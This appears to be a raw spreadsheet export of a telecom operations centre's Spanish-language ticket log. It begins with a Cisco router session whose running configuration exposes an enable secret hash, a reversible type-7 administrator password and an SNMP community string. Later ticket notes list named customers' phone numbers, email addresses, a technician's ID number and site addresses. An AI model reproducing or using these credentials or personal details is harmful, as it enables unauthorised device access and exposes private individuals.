    REPLY FROM 10.174.68.212: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.174.68.212 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
CONFIG DEL CPE:
&lt;GMIXGTMVN1T1B03B02EIM4&gt;TEL VPN-INSTANCE INTERNET_GT_METRO 10.174.68.212
TRYING 10.174.68.212 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.174.68.212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GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO#ENABLE
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO#@T7AC43D
% BAD IP ADDRESS OR HOST NAME
% UNKNOWN COMMAND OR COMPUTER NAME, OR UNABLE TO FIND COMPUTER ADDRESS
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO#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GATEWAY OF LAST RESORT IS 10.174.68.209 TO NETWORK 0.0.0.0
S*    0.0.0.0/0 [1/0] VIA 10.174.68.209
      10.0.0.0/8 IS VARIABLY SUBNETTED, 3 SUBNETS, 2 MASKS
C        10.174.68.208/28 IS DIRECTLY CONNECTED, GIGABITETHERNET0/0
L        10.174.68.212/32 IS DIRECTLY CONNECTED, GIGABITETHERNET0/0
C        10.212.159.67/32 IS DIRECTLY CONNECTED, LOOPBACK5
      200.6.240.0/24 IS VARIABLY SUBNETTED, 2 SUBNETS, 2 MASKS
C        200.6.240.44/30 IS DIRECTLY CONNECTED, GIGABITETHERNET0/1
L        200.6.240.45/32 IS DIRECTLY CONNECTED, GIGABITETHERNET0/1
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO# SH IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.174.68.212   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         200.6.240.45    YES NVRAM  UP                    UP
LOOPBACK5                  10.212.159.67   YES NVRAM  UP                    UP
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/313900347T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.68.209           0   B443.2600.D9AD  ARPA   GIGABITETHERNET0/0
INTERNET  10.174.68.212           -   54A2.7475.7380  ARPA   GIGABITETHERNET0/0
INTERNET  200.6.240.45            -   54A2.7475.7381  ARPA   GIGABITETHERNET0/1
INTERNET  200.6.240.46            0   0C8D.DBC0.84C1  ARPA   GIGABITETHERNET0/1
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO#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1         0         0         0    399000       163    341000       259         0
* GIGABITETHERNET0/1            0         0         0         0    269000       155    566000       135         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO#SH LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 15 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 15 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 18 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.423: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*MAY 14 14:19:57.127: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*MAY 14 14:20:02.055: %CTS-6-ENV_DATA_START_STATE: ENVIRONMENT DATA DOWNLOAD IN START STATE
*MAY 14 14:20:08.027: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 14 14:20:08.031: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 14 14:20:09.027: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 14 14:20:09.031: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 14 14:20:13.147: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*MAY 14 08:20:15.439 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 14:20:15 UTC SAT MAY 14 2022 TO 08:20:15 GUA SAT MAY 14 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
*MAY 14 08:20:15.551 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 14 08:20:16.647 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 14 08:20:17.467 GUA: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 14 08:20:18.475 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*MAY 14 08:20:20.003 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.4(3)M2, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 06-FEB-15 17:01 BY PROD_REL_TEAM
*MAY 14 08:20:20.007 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO IS UNDERGOING A COLD START
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO# SH CLOCK
*09:08:27.023 GUA SAT MAY 14 2022
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO#SH VER
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.4(3)M2, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 06-FEB-15 17:01 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO UPTIME IS 48 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "USBFLASH0:C1900-UNIVERSALK9-MZ.SPA.154-3.M2.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1926E03D
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245744K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#   PID                   SN
-------------------------------------------------
*1        CISCO1921/K9          FJC1926E03D
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
NTWKESS       NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO# SH INVENTORY
NAME: "CISCO1921/K9", DESCR: "CISCO1921/K9 CHASSIS, HW SERIAL#: FJC1926E03D, HW REVISION: 1.0"
PID: CISCO1921/K9      , VID: V05 , SN: FJC1926E03D
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO#SH PROCESSES CPU HISTORY
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO   09:08:27 AM SATURDAY MAY 14 2022 GUA
      222                         11111     11111               22
  100
   90
   80
   70
   60
   50
   40
   30
   20
   10
     0....5....1....1....2....2....3....3....4....4....5....5....6
               0    5    0    5    0    5    0    5    0    5    0
               CPU% PER SECOND (LAST 60 SECONDS)
                                                    1
      22221111111111121111111111111111111111111111112
  100
   90
   80
   70
   60
   50
   40
   30
   20
   10                                               *
     0....5....1....1....2....2....3....3....4....4....5....5....6
               0    5    0    5    0    5    0    5    0    5    0
               CPU% PER MINUTE (LAST 60 MINUTES)
              * = MAXIMUM CPU%   # = AVERAGE CPU%
  100
   90
   80
   70
   60
   50
   40
   30
   20
   10
     0....5....1....1....2....2....3....3....4....4....5....5....6....6....7..
               0    5    0    5    0    5    0    5    0    5    0    5    0
                   CPU% PER HOUR (LAST 72 HOURS)
                  * = MAXIMUM CPU%   # = AVERAGE CPU%
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO# SH RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 2766 BYTES
!
VERSION 15.4
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$HDZR$QY0MDTZIHIUTGYBWHAWPU/
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
!
!
!
!
!
!
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1921/K9 SN FJC1926E03D
!
!
USERNAME GESTIONIP PRIVILEGE 15 PASSWORD 7 10402C4E1247000048
!
REDUNDANCY
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.159.67 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/313900347T/_/
 BANDWIDTH 10240
 IP ADDRESS 10.174.68.212 255.255.255.240
 IP VIRTUAL-REASSEMBLY IN
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 200.6.240.45 255.255.255.252
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.174.68.209
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_CALZADA SAN JUAN 1-83  ZONA 7 MIXCO  CENTRO COMERCIAL PLAZA FLORIDA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GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO#
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO#PING 8.8.8.8 SOURCE GIGABITETHERNET 0/1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 200.6.240.45
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 36/38/40 MS
CC_GMG_GT_INTERNET_PLAZA_FLORIDA_MIXCO#</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. EBER CASTRO (502)4069-3045  ACTUALMENTE EN LINEA PROCEDE A UBICAR EQUIPOS...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ROBERTO REYES 2588-8050 CONTESTO SRTA. ELIZATHET VALIDA ENLACE, ID: 2001370156.</t>
  </si>
  <si>
    <t>F4563249</t>
  </si>
  <si>
    <t>SE ESTA EN LINEA CON EL CLIENTE HENRY ORDOÑEZ 56010515
ESTADO DE LAS LUCES DEL ASMI52L
PWR VERDE
SYNC VERDE
E1 SYNC APAGADO
ALM APAGADO
CLIENTE COMENTA QUE YA REINICIO LA PBX Y EL MODEM Y SIGUE EL PROBLEMA. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>CLIENTE  NO NOS CONTESTA PARA REALIZAR PRUEBAS CON LOS EQUIPOS Y LA PBX
SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4563351</t>
  </si>
  <si>
    <t>SE CONTACTA A CLIENTE JAIRO GOMEZ 78551587 SE LE RETROALIMENTA SOBRE EL ESTADO DE LA FALLA Y SE LE INDICA QUE APROXIMADAMENTE EN MEDIA HORA SU SERVICIO SERÍA REESTABLECIDO, CONSULTA SOBRE S SE TIENEN MAS CLIENTES AFECTADOS, PERO NO TENEMOS A LA MANO ESTA INFORMACIÓN YA QUE POR SER FIN DE SEMANA MUCHOS CLIENTES NO LABORAN LUEGO DEL MEDIO DIA, SE LE EXPLICA ESTO A CLIENTE Y AGRADECE LA INFORMACION.
2001471503</t>
  </si>
  <si>
    <t>F4563379</t>
  </si>
  <si>
    <t>CLIENTE REINICIA EQUIPO CTC PERO E1 CONTINÚA EN EL MISMO ESTADO, UBICA EQUIPO AETHRA 6044 EL CUAL NO ESTÁ ALARMADO, SE ABRIRÁ WO PARA COORDINAR VISITA PARA REVISAR LA FIBRA.</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FERLANDI MONTEJO 58822540, CLIENTE APOYA A UBICAR EQUIPOS</t>
  </si>
  <si>
    <t>F4563393</t>
  </si>
  <si>
    <t>SE RECIBE LLAMDA DEL CLIENTE PARA SEGUIMIENTO DEL TEMAS DE UPS EN AL AGENCIA, SIN EMBARGO EN LLAMDA NO SE LOGRA UBICAR LOS UPS SE DEBE LLAMAR A LA CENTRAL PARA QUE NOS APOYEN EN VALIDAR SI LA AGENCIA CUENTA CON UPS.
RESULTADO: CONTESTADA
NOMBRE: 52081528
NÚMERO: 52081528
INICIO: HOY, 15:39
FIN: HOY, 15:52
DURACIÓN: 13:41
ID DE LLAMADA: 2001741093</t>
  </si>
  <si>
    <t>SE ENVIA CORREO SEGUN LO SOLICITADO POR ANIBAL GONZALES
KENNY ROBERT RIVERA JUAREZ
ESTIMADO ANÍBAL,
EN SEGUIMIENTO AL ENLACE PARA LA AGENCIA CC_BANRURAL_GT_AGENCIA_0594, SOLICITO TU ACOSTUMBRADO APOYO SEGÚN LO CONVERSADO VÍA TELEFÓNICA, YA QUE ENLACE HA GENERADO REINCIDENCIA EN LAS ALARMAS DEL MONITOREO PROACTIVO POR REINICIOS CONSTANTES EN EL EQUIPO CISCO Y POR SER LA ENERGÍA ELÉCTRICA INESTABLE EN EL LUGAR. QUEDO AL PENDIENTE.
TICKET: F4563393
ID: 8902116T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0594
UBICADO EN: 20 AGENCIA 594 - PARCELAMIENTO CABALLO BLANCO CHAMPERICO RETALHULEU
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>CLIENTE SOLICITA RETIRAR DEL MONITOREO POR NO CUMPLIR CON LOS REQUISITOS MINIMOS
TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
BUENA TARDE KENNY
POR FAVOR SACAR DEL MONITOREO PROACTIVO ESTA AGENCIA YA QUE EN ESTA ZONA LA ENERGÍA ELÉCTRICA ES MUY INESTABLE.</t>
  </si>
  <si>
    <t>SE HABLA CON ANIBAL GONZALEZ 50257081768 INFORMA QUE LA AGENCIA NO CUENTA CON UPS Y LA ENERGIA ES MUY INESTABLE EN EL LUGAR, ASI TAMBIEN PASAN LARGOS PERIODOS SIN ENERGIA POR LO QUE NO ES POSIBLE MANTENER EL CPE SIN REINICIOS, LO CUAL VA A ESTAR GENERANDO REINCIDNACIA EN EL MONITOREO  POR LO QUE SE ACUERDA ENVIAR CORREO PARA SOLICITAR RETIRAR DE MONITOREO SEGUN LO SOLICITADO POR CLIENTE.
ID
3001262453
COLA:
NOMBRE: A: 57081768
NÚMERO: 011 50257081768
DURACIÓN: 0:06:41
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50257081768
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 18/05/2022 17:20:07</t>
  </si>
  <si>
    <t>SE LLAMA A AGENCIA RESPONDE EMILDA QUIEN INDICA QUE DESCONOCE SI SE ENCUENTRAN PROTEGIDO LOS EQUIPOS Y CONFIRMA QUE SI HAN TENIDO REPETIDOS PROBLEMAS CON ENERGIA COMERCIAL, SOLICITA NUMERO DE CNOC PARA DEVOLVER LA LLAMADA DEBIDO A QUE TIENE QUE VALIDAR, SE QUEDA A LA ESPERA DE LA COMUNICACIÓN DE CLIENTE
2001688175
COLA:
NOMBRE: A: 52081528
NÚMERO: 52081528
DURACIÓN: 0:03:15
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 52081528
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 16/05/2022 13:01:38</t>
  </si>
  <si>
    <t>F4563399</t>
  </si>
  <si>
    <t>--- SE LLAMA A MARLON NAVAS 30727797 (CLIENTE DE LA CENTRAL), INDICA QUE EL EL SITIO DEJARON DE LABORAR A LAS 13:00 HRS., INICIAN DE NUEVO EL DIA LUNES 16/05/2022 A PARTIR DE LAS 9:00 HRS., SOLICITA QUE SE ENVIE LA INFORMACION DEL PERSONAL QUE ATENDERA A LA CUENTA DE CORREO QUE BRINDO DEBIDO A QUE DESDE AHI HARAN LA GESTION DE LOS ACCESOS. ...</t>
  </si>
  <si>
    <t>--- SE LLAMA AL PUNTO REMOTO, SIN EMBARGO; NO SE LOGRA COMUNICACION. ....
RESULTADO: LLAMADA HECHA
NOMBRE: 24139400
NÚMERO: 24139400
INICIO: HOY, 15:10
FIN: HOY, 15:12
DURACIÓN: 1:40
ID DE LLAMADA: 2001449186
RESULTADO: LLAMADA HECHA
NOMBRE: 24139400
NÚMERO: 24139400
INICIO: HOY, 15:12
FIN: HOY, 15:13
DURACIÓN: 1:22
ID DE LLAMADA: 2001450158
...</t>
  </si>
  <si>
    <t>F4563432</t>
  </si>
  <si>
    <t>SE CONTACTA A CLIENTE ADRIAN 44639016 EN EL PUNTO REMOTO, SE SOLICITA QUE PUEDA APOYARNOS AGILIZANDO EL TRAMITE CON LA ADMINISTRACIÓN DEL CC, PARA TENER LA AUTORIZACIÓN DE ABRIR EL POZO Y PODER PROCEDER CON LA REPARACIÓN DEL ENLACE Y PODER REESTABLECERLO, CLIENTE INDICA ESTAR DE ACUERDO Y HABLAR CON ELLOS PARA AGILIZARLO.
2001475468</t>
  </si>
  <si>
    <t>F4563442</t>
  </si>
  <si>
    <t>SE LLAMA A AGENCIA ATIENDE DARLIN CARILLAS QUIEN INDICA QUE ACTUALMENTE NO PUEDE APOYAR POR LO QUE SOLICITA QUE SE LE LLAME NUEVAMENTE A LAS 16:30
2001695239
COLA:
NOMBRE: A: 46261797
NÚMERO: 46261797
DURACIÓN: 0:01:42
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 46261797
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 16/05/2022 13:21:04</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A LA AGENCIA PERO NO SE TIENE RESPUESTA
RESULTADO: LLAMADA HECHA
NOMBRE: 46261797
NÚMERO: 55280199
INICIO: HOY, 12:58
FIN: HOY, 12:59
DURACIÓN: 0:42
ID DE LLAMADA: 3001866086
3001870726
COLA:
NOMBRE: A: 46261797
NÚMERO: 46261797
DURACIÓN: 0:00:11
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:SUSCRIPTOR AUSENTE (CÓDIGO DE CAUSA ISDN 20)/480:SIP - NO DISPONIBLE TEMPORALMENTE]
DETALLES: 46261797
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 19/05/2022 13:03:20</t>
  </si>
  <si>
    <t>F4563457</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA PARA SOLICITAR INFORMACION SI LOS EQUIPOS SE ENCUENTRAN PROTEGIDOS PERO INDICA QUE ESTO SE REALIZA CON APOYO DEL GERENTE Y NO SE ENCUENTRA EN ESTE MOMENTO POR LO QUE SOLICITA QUE SE LLAME NUEVAMENTE A LAS 14;30
2001699309
COLA:
NOMBRE: A: 25041501
NÚMERO: 25041501
DURACIÓN: 0:01:54
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 25041501
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 16/05/2022 13:33:48</t>
  </si>
  <si>
    <t>F4563483</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO  CLIENTE INDICANDO QUE ESTAMOS A LE ESPERA QUE CONFIRMEN ACCESOS || SE ENVIO NUEVAMENTE DATOS DEL TECNICO YA QUE EN CRONOLOGIA INDICAN LA REINCIDENCIA DE ÉSTE CLIENTE
ERITO FERNANDO TECU XITUMUL
DOM 15/05/2022 16:13
ASUNTO: RE: ENLACE INESTABLE DE PALI CARIARI ID: CONTR0001564854OC
BUENA TARDE ESTIMADOS WALMART.
EN SEGUIMIENTO AL CASO ID: CONTR0001564854OC || CORPORACION DE SUPERMERCADOS UNIDOS SRL.
LE COMENTO QUE EL SERVICIO ACTUALMENTE SE ENCUENTRA OPERATIVO Y ESTABLE. EL DÍA DE AYER SE SOLICITÓ NOS APOYARAN CON EL HORARIO DE ATENCIÓN Y LOS ACCESOS AL SITIO DEBIDO A QUE NUESTRO PERSONAL SE ENCONTRABA A 2 HORAS DE LA SUCURSAL.
SOLICITAMOS NOS PUEDAN APOYAR CON LA INFORMACIÓN SOLICITADA YA QUE SE TIENE PROGRAMADO UNA VISITA PARA VERIFICAR LOS EQUIPOS EN SITIO.
TECNICO ASIGNADO: MICHAEL VALLADARES CEDULA 701500122
QUEDAMOS ATENTO A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR MALAQUIAS INDICA QUE YA ESTAN AUTORIZADOS LOS PERMISOS QUE YA SE PUEDE PRESENTAR EL TECNICO AL SITIO Y CUALQUIER COSA QUE SE LE VUELVA A LLAMAR**
ID 2001592141
**</t>
  </si>
  <si>
    <t>14/05/2022 17:37:36 GUATEMALA/CENTRO AMERICA (OMAR ALBERTO OCHOA HID):
SE RECIBE LLAMADA DE SUPERVISOR DE MANTENIMIENTO CR CONSULTA EL HORARIO DE ATENCIÓN DE CLIENTE EN PR, PARA SABER EL HORARIO DE ATENCIÓN, EL MISMO INDICA QUE CIERRAN A LAS 20:00 HRS, INDICA SUPERVISOR  DE ENTERADO Y EL PERSONAL EN SITIOQUE ATIENDE ES 70190048 NESMER CARRILLO, AUN NO HAN RESPONDIDO CORREO CON AUTORIZACIÓN DE INGRESO.
2001473271</t>
  </si>
  <si>
    <t>F4563534</t>
  </si>
  <si>
    <t>*/*/*/*/CLIENTE ESCRIBE Y SE LE INDICA QUE CNOC RESPONDERA*/*/*/SE LE INFORMA A GESTOR ROBERTO.GARCIA POR SKYPE Y SE CAMBIA DE ESTADO*/*/*/
DE: KANDY KRYSTINA CORONADO RAMON EN NOMBRE DE CORPOWALMART
ENVIADO EL: SÁBADO, 14 DE MAYO DE 2022 17:48
PARA: 'DIEGO MORA (VENDOR)' &lt;LUIS.D.MORA@WALMART.COM&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI SAN FELIPE ID: CONTR0001526842OC
BUENAS TARDES DIEGO,
            DANDO SEGUIMIENTO A SU CASO, HEMOS TRASLADADO LA INFORMACIÓN AL ÁREA CORRESPONDIENTE PARA PROCEDER, QUEDAMOS A LA ESPERA DE LOS COMENTARIOS DE CNOC CA.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN
----------------------------------------------------------------------------------------
DE: DIEGO MORA (VENDOR) [MAILTO:LUIS.D.MORA@WALMART.COM]
ENVIADO EL: SÁBADO, 14 DE MAYO DE 2022 17:08
PARA: ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI SAN FELIPE ID: CONTR0001526842OC
BUENAS TARDES,
SE VALIDA QUE EL ENLACE SE ENCUENTRA OPERATIVO Y ESTABLE, FAVOR DE VALIDAR BIEN EL ENLACE Y LOS EQUIPOS DE TIENDA, YA QUE NO SE PRESENTÓ PROBLEMAS DE ENERGÍA ELÉCTRICA EN EL SITIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4563535</t>
  </si>
  <si>
    <t>***--- CL INDICA QUE REVISARAN CON SU EJECUTIVA SIN EMBARGO PIDE LAS GRAFICAS --**
ESTIMADOS,
VALIDAREMOS CON EJECUTIVO DE CUENTA, MIENTRAS TANTO FAVOR DE COMPARTIR LAS GRAFICAS DE UTILIZACIÓN SOLICITADAS ANTERIORMENTE.
QUEDAMOS ATENTOS A SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL Y SE PIDE APOYO VÍA SKYPE AL CNOC PARA AVANCES ---*-
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: DOMINGO, 15 DE MAYO DE 2022 05:23
PARA: CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;
